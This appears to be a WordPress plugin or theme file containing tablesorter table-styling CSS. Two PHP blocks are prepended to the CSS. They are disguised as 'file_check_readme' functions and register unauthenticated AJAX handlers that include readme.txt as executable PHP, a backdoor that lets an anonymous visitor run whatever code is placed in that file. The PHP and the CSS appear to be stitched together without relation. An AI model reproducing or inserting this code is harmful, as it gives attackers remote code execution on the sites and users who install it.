if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
.tablesorter-default tr.odd td { background-color: #fafafa; } .tablesorter-default tr.even td { background-color: #ffffff; } .tablesorter-default tbody > tr:hover > td, .tablesorter-default tbody > tr.even:hover > td, .tablesorter-default tbody > tr.odd:hover > td { background-color: #f1f1f1; } .tablesorter-default tbody > tr.checked > td { background-color: #efefff; } .tablesorter-default tbody > tr.checked:hover > td { background-color: #e1e1ff; } .tablesorter-default .avatar { margin-right: 5px; vertical-align: middle; }